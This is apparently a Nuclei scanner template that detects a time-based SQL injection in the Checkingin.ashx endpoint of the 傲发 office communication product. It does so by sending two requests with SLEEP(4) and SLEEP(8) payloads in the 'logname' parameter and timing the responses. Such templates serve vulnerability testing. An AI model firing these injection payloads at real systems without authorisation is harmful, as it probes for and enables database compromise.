id: aofa-Checkingin_ashx-sql-time
info:
  name: 傲发办公通信专家 Checkingin.ashx sql注入漏洞
  author: xxx
  severity: high
  tags: sql injection

http:
  - raw:
      - |
        GET /handle/Checkingin.ashx?type=checkingin&logname='+and+(SELECT+*+FROM+(SELECT(SLEEP(4)))x)+and+'&date=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
      - |
        GET /handle/Checkingin.ashx?type=checkingin&logname='+and+(SELECT+*+FROM+(SELECT(SLEEP(8)))x)+and+'&date=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<=5'  
          - 'duration_2>=8 && duration_2<=9'
        condition: and